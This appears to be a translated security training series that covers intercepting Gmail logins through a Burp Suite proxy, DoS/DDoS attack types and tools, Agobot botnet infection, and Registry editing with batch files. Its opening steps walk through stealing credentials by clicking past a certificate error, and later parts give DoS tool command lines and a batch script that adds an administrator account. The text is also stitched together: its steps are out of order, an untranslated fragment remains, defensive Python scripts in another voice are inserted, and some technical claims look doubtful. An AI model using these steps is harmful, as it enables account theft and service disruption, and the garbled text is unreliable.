Step 5: Look in the proxy for the user/password
Step 1: Install Java
- After downloading the Java installer from sun.com, install it to prepare the environment for programs that run on Java
Step 2: Run Burpsuite
- After downloading Burpsuite, extract it; stop when you reach the .jar file
- Run Burpsuite_v1.3 as the intercepting proxy. Double-click the .jar file extracted from the download
Running Burpsuite
By default this program only acts as a proxy for the machine it runs on. For other machines to be able to use it as a proxy, go to the Proxy tab and choose Options, where you can edit the port used (default 8080) and clear the "loopback only" check box
Switch to the Intercept tab to configure the operating modes of the intercepting proxy
- Intercept on mode: this is the active mode. If someone sets this computer as their proxy, all of their Internet access is controlled by this proxy. When a request comes from the browser to the proxy, it captures the content, which can be edited and then forwarded before it reaches the web server
- We turn this mode off by clicking Intercept on, which becomes off. The aim is that a user using this program as a proxy can still browse the Internet normally; in this mode it only logs the information of the user's web accesses
Step 3: Set the proxy
- In IE set the proxy to address 127.0.0.1 port 8080: IE -> Internet Options -> Connections tab -> LAN Settings button
- Or run the .bat file with the contents shown above
- Or use the tool to convert the .bat to an .exe and run that .exe
Step 4: Access Gmail through IE (with the proxy set)
When accessing Gmail you will see a certificate error warning; click Continue to proceed
Google continues to report a Certificate Error; you still type the username and password to get into Mail
I am in my mail and the Certificate Error warning is still showing
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Bc 5: Vo Proxy tm thng tin Username v Pass
- Vo Burpsuite Chuyn sang tab Target Chn Site Map
- La chn trang web https://www.google.com Vo mc Accounts
Vo mc ServiceLoginAuth Nhn chuyn sang bn phi chn
Request (thng tin gi ln server) vo mc Raw chng ta s thy
thng tin Username v Passwor
https://www.google.com/
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
I. Detecting the attack and securing a Gmail account
To steal a Gmail password the attacker must get the user to set a proxy that routes through an intercepting proxy, and then forge the certificate. To detect this and protect your Gmail account you can therefore use the following methods:
1. Detect whether your connection goes through a proxy
Check by opening the proxy settings before going on the Internet and seeing whether any address has been configured.
This method is very useful but is somewhat cumbersome to carry out, and it is easily forgotten or skipped.
2. Detect a forged certificate
a. Normal access
+ Opening Gmail does not show any pop-up proposing to download a certificate.
+ Clicking the padlock icon and viewing the certificate shows that it was issued by VeriSign.
b. Access through an intercepting proxy
+ Accessing Gmail brings up a window reporting that the certificate is in error and asking whether to continue. If you see this, the recommendation is not to continue and to re-check the safety of the network and the computer before accessing.
+ If the user continues into the Gmail page there is no padlock icon; in its place is the Certificate Error icon.
+ Viewing this certificate we see that it was not issued by VeriSign.
Note: If the user sees these two signs, the recommendation is not to continue into Gmail, because the username and password can easily be stolen. In addition, users should not save passwords for automatic login, because when the computer falls into someone else's hands the information stored in IE or Firefox can easily be exploited. Users should also install antivirus programs to block the viruses and keyloggers that steal passwords.
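The two checks above (is a proxy configured, and who issued the certificate) can be automated. The following Python script is an added example, not code from the original article: it classifies a certificate by its issuer organisation against an allow-list (the article says Gmail's certificate came from VeriSign, so that is the one entry; the "Intercepting Proxy CA" name and both certificate dicts are constructed), connects with full chain and hostname verification when run against a live host, and reads the IE/WinINET proxy values ProxyEnable and ProxyServer from HKCU on Windows. The Registry path and value names are the documented ones; the rest of the names are this example's own.

```python
import socket
import ssl

# Issuer organisation the article says Gmail's certificate came from; constructed
# allow-list for this example, extend it with the CAs you actually expect.
EXPECTED_ISSUER_ORGS = {"VeriSign, Inc."}


def issuer_org(cert):
    """Return the issuer's organizationName from a getpeercert()-style dict."""
    for rdn in cert.get("issuer", ()):
        for key, value in rdn:
            if key == "organizationName":
                return value
    return None


def assess_cert(cert, expected_orgs=EXPECTED_ISSUER_ORGS):
    """'ok' when the issuer is one we expect, else 'unexpected-issuer'.

    A certificate minted by an intercepting proxy carries the proxy's own CA as
    issuer, which is the "not issued by VeriSign" symptom described above.
    """
    return "ok" if issuer_org(cert) in expected_orgs else "unexpected-issuer"


def fetch_and_assess(host, port=443, timeout=5.0):
    """Connect with chain and hostname verification, then check the issuer.

    A verification failure here is the same condition the browser reports as
    "Certificate Error"; a forged certificate never reaches assess_cert().
    Needs network access, so it is not part of the offline checks.
    """
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return assess_cert(tls.getpeercert())
    except ssl.SSLCertVerificationError:
        return "verification-failed"


def describe_proxy(enabled, server):
    """Summarise WinINET proxy settings (ProxyEnable, ProxyServer)."""
    if not enabled or not server:
        return "no proxy configured"
    return "proxy enabled: " + server


def read_ie_proxy_settings():
    """Read the IE/WinINET proxy values from HKCU (Windows only).

    winreg exists only on Windows, so this is not part of the offline checks.
    """
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        enabled, _ = winreg.QueryValueEx(key, "ProxyEnable")
        try:
            server, _ = winreg.QueryValueEx(key, "ProxyServer")
        except FileNotFoundError:
            server = ""
    return describe_proxy(enabled, server)


# Constructed certificate dicts in getpeercert() shape, for offline checks.
GOOD_CERT = {"issuer": ((("countryName", "US"),),
                        (("organizationName", "VeriSign, Inc."),))}
PROXY_CERT = {"issuer": ((("organizationName", "Intercepting Proxy CA"),),)}


if __name__ == "__main__":
    print(assess_cert(GOOD_CERT), assess_cert(PROXY_CERT))
    print(describe_proxy(1, "127.0.0.1:8080"))
```

A "proxy enabled: 127.0.0.1:8080" result combined with "verification-failed" or "unexpected-issuer" for mail.google.com is precisely the set-up the steps above build, which is why the script reports both rather than either alone.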
Part IV. DoS/DDoS attacks and how to defend against them
Detailed contents of this article:
1. History of DoS and DDoS attacks
2. Definition: Denial of Service attack
3. Types of DoS attack
4. DoS attack tools
5. BOT networks
6. DDoS attacks
7. Classification of DDoS attacks
8. DDoS attack tools
9. Computer worms in DDoS attacks
I. History of DoS attacks
1. Targets
- The attacks usually target large websites and e-commerce organizations on the Internet.
2. The attacks
- On 15 August 2003, Microsoft suffered a very strong DoS attack that disrupted its websites for 2 hours.
- At 15:09 GMT on 27 March 2003, the entire English-language version of the Al-Jazeera website was attacked and disrupted for many hours.
II. Definition of a DoS attack
A DoS attack is an extremely dangerous kind of attack; to understand it we need to clarify the definition of a DoS attack and its various forms.
- A DoS attack is one in which someone makes a system unusable, or significantly slows it down for normal users, by overloading the system's resources.
- If attackers are unable to penetrate the system, they try to find a way to make it collapse so that it cannot serve normal users; that is a Denial of Service (DoS) attack.
Although a DoS attack cannot access the system's actual data, it can disrupt the services the system provides. As defined above, a DoS attack exploits the weakest points of the system; the goals of a DoS attack are:
1. Goals of a DoS attack
- To consume network bandwidth and flood the network, after which the network cannot provide other services to normal users.
- To break the connection between two machines and block access to a service.
- To prevent specific users from accessing a service.
- To block services so that others cannot access them.
- When a DoS attack occurs, users accessing the service experience it as:
+ Disable Network (the network is down)
+ Disable Organization (the organization stops functioning)
+ Financial Loss
2. Resources that attackers typically target with DoS attacks
As seen above, a DoS attack occurs when the attacker exhausts the system's resources so that the system can no longer serve normal users. So which resources do they typically attack?
- Creating scarcity, limits, and non-renewal of resources.
- Network bandwidth, memory, disk, CPU time, and data structures are all targets of DoS attacks.
- Attacks on other systems that support the computer network, such as the air conditioning, the power system, the cooling system, and many other enterprise resources. Imagine the power to the web server being cut: can users still reach the server?
- Destroying or altering configuration information.
- Damaging the physical layer or network equipment such as power supplies and air conditioning.
III. Types of attack
Denial of Service attacks are divided into two types:
- DoS attack: an attack from one individual, or a set of individuals.
- DDoS attack: an attack from a network of computers designed to attack a specific target.
1. Types of DoS attack
- Smurf
- Buffer Overflow Attack
- Ping of Death
- Teardrop
- SYN Attack
a. Smurf attack
- The perpetrator generates a very large amount of ICMP (ping) traffic to the broadcast addresses of many networks, with the source address set to the intended target.
* Note that a ping is a two-way process: when machine A pings machine B, B replies to complete the exchange. When I ping the broadcast address of some network, every computer in that network replies to me. But if I now change the source address to machine C and ping the broadcast address of some network, every computer in that network replies to machine C instead of to me, and that is the Smurf attack.
- As a result the target receives an enormous wave of ICMP replies, and its network is knocked out or slowed down to the point that it cannot provide other services.
- The process is amplified when the ping replies come from a network of interconnected machines (a BOT network).
- The Fraggle attack uses UDP echo and is otherwise similar to the Smurf attack.
Figure: a DoS attack of the Smurf type, using ICMP packets to flood other communications.
b. Buffer overflow attack
- A buffer overflow occurs whenever a program writes more data than the buffer in memory can hold.
- Attackers can overwrite data, control program execution, and hijack control of certain programs in order to execute malicious code. I presented how this buffer overflow flaw is exploited in the earlier article on hacking Windows, also on www.vnexperts.net.
- Sending an e-mail whose attachment exceeds 256 characters can trigger a buffer overflow.
c. Ping of Death attack
- The attacker sends IP packets larger than the maximum IP packet size of 65,536 bytes.
- Splitting the IP packet into smaller fragments is performed at layer II.
- Fragmentation can be done for an IP packet larger than 65,536 bytes, but the operating system cannot recognize the size of such a packet and reboots, or simply loses communication.
- Detecting an attacker who sends packets larger than allowed is relatively easy.
d. Teardrop attack
- A very large IP packet arriving at a router is split into many small fragments.
- The attacker uses IP packets with very confusing parameters for how they are split into fragments.
- If the operating system receives the fragmented packets and cannot make sense of them, it tries to rebuild the packet, which consumes some system resources; if this happens continuously, the system has no resources left for other applications or to serve other users.
e. SYN attack
- The attacker sends (fake) TCP SYN requests to the target server. To process these SYN packets the system must spend memory on each connection.
- When very many fake SYN packets arrive, they use up the server's capacity to handle requests. A normal user connecting to the server begins with a TCP SYN request, and at this point the server can no longer respond, so the connection is not established.
- This is an attack in which the attacker abuses the TCP three-way handshake.
- Malicious code can generate an extremely large number of TCP SYN packets to the target server, with the packets' source IP addresses altered; this is the DoS attack.
- The upper figure shows normal communication with the server; the lower one shows the server under attack: very many SYN packets arrive while the server's capacity to reply is limited, and so the server refuses legitimate accesses.
- The TCP three-way handshake works as follows when machine A wants to talk to machine B: (1) A sends a TCP SYN packet to B; (2) on receiving the SYN from A, B sends A an ACK packet (the SYN&ACK) agreeing to the connection; (3) A sends B an ACK packet and data communication begins.
- A and B keep the connection for at least 75 seconds; afterwards they perform another TCP three-way handshake for the next session to exchange data.
- Unfortunately the attacker abuses this gap to exhaust the system's resources: they shrink the interval between handshake requests to a very small value and never send the final ACK, firing SYN packets continuously for a period of time and never answering the SYN&ACK from the targeted machine.
- A rule of accepting only one SYN packet from a given machine every 75 seconds, and moving any IP address that violates it into a deny-access rule, will block this attack.
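The attack types in this section each leave a recognisable pattern in packet summaries, and the 75-second SYN rule at the end of the SYN attack description can be implemented as a detector. The following Python script is an added example, not code from the original article: it runs four checks over a constructed list of packet summaries (RFC 5737 documentation addresses, with 192.0.2.10 standing in for the protected server; the field names t, proto, src, dst, flags, type, off and len are this example's own). The checks are the article's one-SYN-per-75-seconds rule, SYNs that are never followed by an ACK, echo replies arriving from many hosts that the destination never pinged (Smurf), and fragments whose offset plus length exceeds the IP maximum (Ping of Death).

```python
from collections import defaultdict

# Constructed packet summaries using RFC 5737 documentation addresses; not a real
# capture. 192.0.2.10 plays the protected server.
PACKETS = [
    # Burst of SYNs from one source in half a second, never followed by an ACK.
    *[{"t": 0.1 * i, "proto": "tcp", "src": "203.0.113.7",
       "dst": "192.0.2.10", "flags": "S"} for i in range(5)],
    # Legitimate client: one SYN, then the final ACK of the handshake.
    {"t": 1.0, "proto": "tcp", "src": "198.51.100.4", "dst": "192.0.2.10", "flags": "S"},
    {"t": 1.1, "proto": "tcp", "src": "198.51.100.4", "dst": "192.0.2.10", "flags": "A"},
    # Smurf pattern: echo replies from many hosts to 192.0.2.10, which sent no request.
    *[{"t": 2.0, "proto": "icmp", "type": "echo-reply", "src": "198.51.100.%d" % n,
       "dst": "192.0.2.10"} for n in range(1, 6)],
    # Normal ping: one request out, one reply back.
    {"t": 3.0, "proto": "icmp", "type": "echo-request", "src": "203.0.113.9", "dst": "198.51.100.9"},
    {"t": 3.0, "proto": "icmp", "type": "echo-reply", "src": "198.51.100.9", "dst": "203.0.113.9"},
    # IP fragments; offset + length beyond 65535 is the Ping of Death signature.
    {"t": 4.0, "proto": "ipfrag", "src": "203.0.113.7", "dst": "192.0.2.10", "off": 65528, "len": 16},
    {"t": 4.1, "proto": "ipfrag", "src": "198.51.100.4", "dst": "192.0.2.10", "off": 1480, "len": 1480},
]


def syn_offenders(packets, window=75.0, limit=1):
    """Sources sending more than `limit` SYNs within `window` seconds.

    With the defaults this is exactly the rule stated above (one SYN per source
    per 75 s). Real browsers open several connections at once, so a production
    threshold needs a higher limit or per-destination-port accounting.
    """
    recent = defaultdict(list)
    offenders = set()
    for p in sorted(packets, key=lambda p: p["t"]):
        if p["proto"] != "tcp" or p.get("flags") != "S":
            continue
        times = recent[p["src"]]
        while times and p["t"] - times[0] > window:   # expire SYNs outside the window
            times.pop(0)
        times.append(p["t"])
        if len(times) > limit:
            offenders.add(p["src"])
    return offenders


def half_open_sources(packets):
    """Sources whose SYNs were never followed by an ACK to the same destination."""
    synners, completed = set(), set()
    for p in packets:
        if p["proto"] != "tcp":
            continue
        pair = (p["src"], p["dst"])
        if p.get("flags") == "S":
            synners.add(pair)
        elif "A" in p.get("flags", ""):
            completed.add(pair)
    return {src for src, _dst in synners - completed}


def smurf_victims(packets, min_sources=3):
    """Destinations receiving echo replies from many hosts they never pinged."""
    requested = {(p["src"], p["dst"]) for p in packets
                 if p["proto"] == "icmp" and p["type"] == "echo-request"}
    reply_sources = defaultdict(set)
    for p in packets:
        if (p["proto"] == "icmp" and p["type"] == "echo-reply"
                and (p["dst"], p["src"]) not in requested):
            reply_sources[p["dst"]].add(p["src"])
    return {dst for dst, srcs in reply_sources.items() if len(srcs) >= min_sources}


def oversized_fragments(packets, max_ip_len=65535):
    """Fragments whose reassembled size would exceed the IP maximum."""
    return [(p["src"], p["dst"], p["off"] + p["len"]) for p in packets
            if p["proto"] == "ipfrag" and p["off"] + p["len"] > max_ip_len]


if __name__ == "__main__":
    print("SYN rate offenders:", syn_offenders(PACKETS))
    print("half-open sources:", half_open_sources(PACKETS))
    print("Smurf victims:", smurf_victims(PACKETS))
    print("oversized fragments:", oversized_fragments(PACKETS))
```

The half-open check is the more robust of the two SYN tests: a spoofed source never completes the handshake, whereas a busy but legitimate client trips the strict 75-second rule, so in practice the rate rule is applied with a higher limit or combined with the half-open result before an address is placed in a deny rule.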
IV. DoS attack tools
- Jolt2
- Bubonic.c
- Land and LaTierra
- Targa
- Blast20
- Nemesy
- Panther2
- Crazy Pinger
- Some Trouble
- UDP Flood
- FSMax
1. DoS tool: Jolt2
- Lets an attacker deny service (DoS) on Windows-based systems.
- It causes the attacked server's CPU to run at 100% constantly, so the CPU cannot handle other services.
- Non-Windows platforms such as Cisco routers and some other routers can also have this vulnerability and be attacked by this tool.
2. DoS tool: Bubonic.c
- Bubonic.c is a DoS tool based on security holes in Windows 2000.
- It works by randomly sending TCP packets with random settings, which costs the server a great deal of resources to process and exposes security weaknesses.
- Bubonic.c is used by typing the command: bubonic 12.23.23.2 10.0.0.1 100
3. DoS tool: Land and LaTierra
- IP address spoofing combined with the process of opening connections between two computers.
- Both the source IP address and the destination IP address are altered to the destination's address; if this attack occurs while a connection between machines A and B is in progress, that connection is broken.
- This happens because the packet's source and destination addresses are identical, so the packet cannot reach its intended destination.
4. DoS tool: Targa
- Targa is a program that can use 8 different types of DoS attack.
- It is regarded as an integrated toolkit of all DoS effects and is often bundled in versions of rootkits.
- The attacker uses one attack method after another against a system until the goal is achieved.
- Targa is a powerful program capable of causing great danger to a company's network.
5. DoS tool: Blast 2.0
- Blast is very small; it is a tool for testing TCP service capacity. It can generate a very large volume of TCP packets and can endanger a network with weak servers.
- Below is how Blast 2.0 is used against an HTTP server:
+ Blast 192.168.1.219 80 40 50 /b GET /some /e url/ HTTP/1.0 /nr /dr /v
- Against a POP server:
+ Blast 192.168.1.219 110 15 20 /b user te /e d /v
6. DoS tool: Nemesys
- This program generates random packets (random protocol, port, size, etc.).
- Using this program an attacker can run malicious code on an unsecured computer.
7. DoS tool: Panther2
- A UDP-based denial-of-service attack designed specifically for 28.8-56 Kbps connections.
- It can consume all of the bandwidth of such a connection.
- It can consume network bandwidth by several methods, for example by pinging extremely fast, and can cause a DoS attack.
8. DoS tool: Crazy Pinger
- This tool can send large ICMP packets to a remote network.
9. DoS tool: Some Trouble
- SomeTrouble 1.0 is a program that congests a network.
- SomeTrouble is a very simple program with three components:
+ Mail Bomb (can itself resolve the name for a given mail address)
+ ICQ Bomb
+ Net Send Flood
10. DoS tool: UDP Flood
- UDPFlood is a program that sends UDP packets.
- It sends UDP packets out to an IP address and port that are not fixed.
- The packet can be a piece of text, or a quantity of data generated randomly or taken from a file.
- It is used to test a server's responsiveness.
11. DoS tool: FSMAX
- Tests a server's response performance.
- It creates a file and then runs it against the server repeatedly, many times at once.
- The effect of this tool is to look for a way to overflow a buffer and DoS the server.
V. Conclusion of part I
- Using a DoS tool against a server sometimes has no effect on it at all. Suppose you use the Ping of Death tool against a server that is connected to the network at 100 Mbps while you are connected to the server at 3 Mbps: your attack is meaningless.
- But imagine 1000 people like you attacking that server at the same time: the combined bandwidth of 1000 people reaches at most 3 Gbps, while the server's link speed is 100 Mbps. You can imagine the result.
- In part II of this series I will present the definitions of BOT and BOTNET, how they are built, and how BOTNETs are used, so that we understand how they work and can find the most effective ways to counter DDoS attacks.
By Tocbatdat, Vnexperts Research Department
In this next part of the article on DoS and DDoS attacks I will present bot networks in detail: the types of bot network and how a botnet is created. Once you understand botnets you can picture how a DDoS attack works. In this part II I also describe the DDoS attack methods and how they are carried out. These articles are only meant to give you a deep understanding of DDoS attacks; the tools are mentioned for introduction only, and they are old DDoS tools.
VI. BOT networks
1. Why BOT networks matter
- Using a DoS tool against a server sometimes has no effect on it at all. Suppose you use the Ping of Death tool against a server that is connected to the network at 100 Mbps while you are connected to the server at 3 Mbps: your attack is meaningless.
- But imagine 1000 people like you attacking that server at the same time: the combined bandwidth of 1000 people reaches at most 3 Gbps, while the server's link speed is 100 Mbps. You can imagine the result.
- But I ask myself how to get 1000 computers connected to the network. Buy a thousand machines and rent 1000 subscriptions? Certainly I would not do that, and no attacker uses this method either.
- Attackers build a network of thousands of Internet-connected computers (some BOT networks reach 400,000 machines). How are they able to exploit Internet users to build such a BOT network? In this article I will introduce BOT networks, how they are built, and the tools used to build them.
- With a BOT network in hand, the attacker uses simple attack tools against a computer system. Relying on entirely legitimate accesses, the bots all use one service of the server at the same time. Imagine the attacker controlling 400,000 machines and ordering all of them to download one file from your website at the same moment. That is DDoS, Distributed Denial of Service.
- There is no way to defend completely against DDoS, but in this article I also introduce methods for preventing DDoS once we understand it.
2. BOT networks
- BOT is short for RoBOT.
- An IRC bot is also called a zombie or a drone.
- Internet Relay Chat (IRC) is a form of real-time data transmission on the Internet. It is generally designed so that one person can message a group, and people communicate with each other in separate channels.
- First the BOT connects to an IRC channel on the IRC server and waits for communication between the participants.
- The attacker can control the BOT network and use it for whatever purpose they choose.
- Many BOTs connected together are called a BOTNET.
3. Botnets
- A botnet consists of many computers.
- It is used for DDoS attacks.
- A small botnet may contain only 1000 computers, but imagine each of them connected to the Internet at just 128 Kbps: the botnet can generate 1000*128 ~ 100 Mbps of bandwidth, a figure that hardly any hosting provider can allocate to each of its websites.
4. Uses of botnets
- Distributed Denial-of-Service (DDoS) attacks
+ Botnets are used for DDoS attacks.
- Spamming
+ Opening a SOCKS v4/v5 proxy server for spamming.
- Sniffing traffic
+ Bots can also sniff packets (capturing traffic on the network); after capturing packets they try to decode them to extract meaningful content such as bank account details and other valuable user information.
- Keylogging
+ With the help of a keylogger, a great deal of sensitive user information can be exploited by the attacker, such as e-banking accounts and many other accounts.
- Installing and spreading malicious programs
+ A botnet can be used to create new BOT networks.
- Installing pop-up advertisements
+ Automatically opening advertisements the user does not want.
- Google AdSense abuse
+ Automatically altering the search results displayed whenever the user uses Google search; the altered results trick users into clicking dangerous websites.
- Attacking IRC chat networks
+ This is called a clone attack.
- Phishing
+ Botnets are also used to send phishing mail in order to obtain sensitive user information.
5. Types of BOT
Agobot/Phatbot/Forbot/XtremBot
- These bots are written in C++, are cross-platform, and their source code is available under the GPL. Agobot was written by Ago, known by the nickname Wonk, a young German who was arrested in May 2004 on computer-crime charges.
- Agobot can use NTFS Alternate Data Streams (ADS) and acts like a rootkit to hide the processes running on the system.
SDBot/Rbot/UrBot/UrXbot
- SDBot is written in C and is also published under the GPL. It is regarded as the ancestor of Rbot, RxBot, UrBot, UrXBot, and JrBot.
mIRC-based bots: GT-Bots
- GT is short for Global Threat, and the name is commonly used for all mIRC-scripted bots. They use the mIRC IM software to set up scripts and other pieces of code.
6. Steps in building a botnet; how a bot network is analyzed
To understand better how a botnet is built, we study how a computer is infected, how a bot network is created, and how that network is used to attack a target, using a botnet built from Agobots.
Step 1: Infecting the computer
- First the attacker tricks the user into running the file chess.exe. An Agobot typically copies itself into the system and adds Registry entries to ensure that it runs with the system at startup. The Registry locations for applications that run at startup are:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
Step 2: Spreading and building the botnet
- Once one computer on the network is infected with Agobot, it automatically searches for other computers on the network and infects them using weaknesses in the network's shared resources.
- They typically try to connect to the default administrative shares, for example C$, D$, E$ and print$, by guessing usernames and passwords in order to access another system and infect it.
- Agobot can spread very quickly because it exploits weaknesses in the Windows operating system, in applications, and in services running on the system.
Step 3: Connecting to IRC
- Agobot's next step is to create an IRC-controlled backdoor that opens the necessary components and connects to the botnet via IRC control; once connected, it opens the services needed so that, on request, it can be controlled by the attacker over the IRC channel.
Step 4: Directing attacks from the botnet
- The attacker directs the machines in the Agobot network to download .exe files and run them.
- Collecting all the relevant information the attacker wants from the system.
- Running other files on the system at the attacker's request.
- Running DDoS programs to attack other systems.
7. Diagram of how a system is infected and Agobot is used
VII. DDoS attack tools
1. Nuclear Bot
- Nuclear Bot is a very powerful "Multi Advanced IRC BOT" that can be used for floods, managing, utilities, spreading, IRC-related tasks, DDoS attacks, and many other purposes.
VIII. DDoS attacks
On the Internet a Distributed Denial of Service attack is an attack from many computers on one target; it causes legitimate requests from normal users to be refused. By generating an extremely large number of packets to a specific target, it can produce a state similar to the system being shut down.
1. Characteristics of DDoS attacks
- It comes from a very large set of computers on the Internet, and usually relies on services already available on the computers in the botnet.
- The attacking services are controlled from the "primary victims", while the compromised computers in the bot network that are used to attack are usually called "secondary victims".
- It is very hard to detect, because the attack originates from many IP addresses on the Internet.
- If one IP address attacks a company, the firewall can block it. If the attack comes from 30,000 different IP addresses, that becomes extremely difficult.
- The perpetrator can do a lot of damage with a DoS attack, and it becomes even more dangerous when a bot network on the Internet carries out the DoS attack; that is called a DDoS attack.
2. DDoS attacks cannot be blocked completely
- DDoS attacks search for security holes on Internet-connected computers and exploit them to build a botnet of many Internet-connected computers.
- Once a DDoS attack is under way it is very hard to stop completely.
- The firewall can block the incoming packets, but most of them come from IP addresses not yet in the firewall's access rules, and they are entirely valid packets.
- If the packet's source address may be spoofed, then once you get no response from the genuine source address you need to block communication with that source address.
- However, a botnet consists of thousands to several hundred thousand IP addresses on the Internet, which makes blocking the attack extremely difficult.
3. The clever attacker
Nowadays no attacker uses their own IP address directly to control the botnet attacking the target; they usually go through an intermediary. Below are the DDoS attack models:
a. Agent-handler model
The attacker uses handlers to control the attack.
b. IRC-based DDoS attacks
The attacker uses IRC networks to control, amplify, and manage connections to the computers in the botnet.
IX. Classification of DDoS attacks
- Attacks that exhaust the bandwidth to the server
+ Flood attack
+ UDP and ICMP flood
- Attacks that amplify traffic
+ Smurf and Fraggle attacks
The DDoS attack on Yahoo.com in 2000
Diagram: classification of DDoS attacks
Diagram: amplification-type DDoS attack
As you know, a Smurf attack pings the broadcast address of some network with the source address set to the address of the target machine, so all the replies are sent to the target's IP address.
X. Reflective DNS attacks
1. Issues related to reflective DNS attacks
- A hacker can use a botnet to send a very large number of requests to DNS servers.
- Those requests flood the DNS servers' network bandwidth.
- This type of attack can be countered with a firewall that blocks traffic from the machines that have been detected.
- But blocking traffic from DNS servers creates big problems: a DNS server plays a very important role on the Internet.
- Blocking DNS traffic amounts to preventing normal users from sending mail and accessing websites.
- A DNS request typically takes 1/73 of the time the server spends on the reply packet. Based on this, a specialized tool that multiplies the requests to the DNS server can overload it so that it can no longer serve normal users.
2. Reflective DNS attack tool: ihateperl.pl
- ihateperl.pl is a very small and very effective program based on the DNS-reflective attack.
- It uses a list of DNS servers to flood the network with name-resolution requests.
- For example it can send a request to resolve google.com to the server, and the domain name can be changed to www.vnexperts.net or any website the attacker wants.
- Using this tool is very simple: create a list of DNS servers, give it the IP address of the victim machine, and set the number of requests.
XI. Tools used for DDoS attacks
Almost all the tools introduced in this article are old and ineffective, and they are presented only for teaching purposes so that you can better understand DDoS attacks. Below are the DDoS attack tools:
- Trinoo
- Tribe Flood Network (TFN)
- TFN2K
- Stacheldraht
- Shaft
- Trinity
- Knight
- Mstream
- Kaiten
These tools can all be downloaded free on the Internet; note that they are weak tools and serve only as demos of DDoS attacks.
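The dilemma in the section above (blocking DNS stops the reflection but also stops mail and web) has a narrower answer: a reflected response arrives at the victim with a transaction ID that the victim never sent, so responses can be matched against outstanding queries and only the unmatched ones dropped or counted. The following Python script is an added example, not code from the article or from any tool it names: it processes a constructed list of DNS packet summaries (RFC 5737 addresses, 192.0.2.10 as the protected host; the field names kind, txid, qname and bytes are this example's own) and reports the responses no query accounts for, grouped by reflector, next to the bytes the host actually requested.

```python
from collections import defaultdict

# Constructed DNS packet summaries seen at the edge of the network that contains
# 192.0.2.10 (the protected host). RFC 5737 addresses; not a real capture.
DNS_EVENTS = [
    # Normal lookup: query out, matching response back (same server, same txid).
    {"t": 0.00, "kind": "query", "src": "192.0.2.10", "dst": "198.51.100.53",
     "txid": 0x1A2B, "qname": "example.com", "bytes": 45},
    {"t": 0.02, "kind": "response", "src": "198.51.100.53", "dst": "192.0.2.10",
     "txid": 0x1A2B, "qname": "example.com", "bytes": 130},
    # Reflection: large responses from four resolvers to txids the host never sent.
    *[{"t": 1.0 + 0.001 * i, "kind": "response", "src": "203.0.113.%d" % (50 + i % 4),
       "dst": "192.0.2.10", "txid": 0x4000 + i, "qname": "example.net", "bytes": 3000}
      for i in range(12)],
]


def unsolicited_responses(events, host):
    """Responses delivered to `host` with no earlier query (server, txid) from it.

    Events are processed in time order so a response can only be matched by a
    query that preceded it; a matched query is consumed, so a duplicate
    response with the same txid is reported too.
    """
    outstanding = set()
    hits = []
    for e in sorted(events, key=lambda e: e["t"]):
        if e["kind"] == "query" and e["src"] == host:
            outstanding.add((e["dst"], e["txid"]))
        elif e["kind"] == "response" and e["dst"] == host:
            key = (e["src"], e["txid"])
            if key in outstanding:
                outstanding.discard(key)
            else:
                hits.append(e)
    return hits


def reflection_summary(events, host):
    """Bytes per reflector plus the bytes the host itself requested, for comparison."""
    per_server = defaultdict(int)
    for e in unsolicited_responses(events, host):
        per_server[e["src"]] += e["bytes"]
    requested = sum(e["bytes"] for e in events
                    if e["kind"] == "query" and e["src"] == host)
    return {"reflectors": dict(per_server),
            "unsolicited_bytes": sum(per_server.values()),
            "requested_bytes": requested}


if __name__ == "__main__":
    summary = reflection_summary(DNS_EVENTS, "192.0.2.10")
    print(len(unsolicited_responses(DNS_EVENTS, "192.0.2.10")), "unsolicited responses")
    print(summary)
```

The reflector list is what goes into a temporary filter: dropping responses from those sources that match no outstanding query leaves the host's own lookups (and its mail and web access) untouched, which the blanket DNS block discussed above does not.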
Part VI. Editing the Registry from the command line, and security applications
1. The role of the command line
2. Creating a .bat file to perform tasks automatically
3. Configuring the REGISTRY with a .bat file
4. Applications of REGISTRY configuration
5. Conclusion
1. The role of the command line
- Every system administrator has to use the command-line interface of their operating system. On Windows, commands are used as well, bringing convenience and flexibility to administration.
2. Creating a .bat file to perform tasks automatically
- Commands placed in a .bat file can be executed one after another.
- Example 1: use Notepad to write the content below and save it as file.bat:
When this file.bat runs, the system will (1) create a user named tocbatdat, (2) add that user to the Administrators group, (3) set the DHCP Client service to Disabled, (4) stop the DHCP Client service, and (5) restart the machine immediately. (The NET, SC and SHUTDOWN commands all have options; type the command followed by /? to display the options of that command.)
Some commonly used commands:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] lets you create users and groups and view the computer's access and network information.
NETSH: this command lets you configure every network-related setting, such as IP address, DNS, and routing.
WMIC: this interface provides a great many options for managing the computer.
- Example 2: create a file.bat whose purpose is to produce a file containing the computer's configuration:
A file.bat with the content above produces a file c.txt containing: the IP address, the running processes, the users on the computer, the open ports, the running services, general system information, and the directory structure of drive C. So a single .bat file can collect a great deal of information about the computer.
3. Configuring the REGISTRY with a .bat file
To configure the Registry we need some way of performing two tasks:
Step 1: create a file.reg with the desired content using commands
Step 2: run the file.reg just created
Example 3: we need to create a file.reg with the following content:
To create a file.reg with that content using a file.bat:
A file.bat with that content performs the following tasks:
Step 1: creates a file.reg with the desired content, as in the first part of the example
Step 2: runs the file.reg just created
Step 3: deletes the files that were created
The result of creating and running a file.bat with this content is that a key is added to the Registry.
Example 4: having added a key, I now want to delete a key in the Registry; what content should the file.bat have?
A file.bat with that content, when run, performs these tasks:
Step 1: creates a file.reg with the desired content. Line 2 selects a folder; a Registry folder holds many keys, and since I only want to delete the one key named TOCBATDAT I use line 3. Line 4 deletes an entire folder in the Registry.
Step 2: runs the file.reg
Step 3: deletes the files that were created.
In summary, in this section 3 I have shown how to edit (add, modify, delete) the Registry from the command line, in particular with a .bat file.
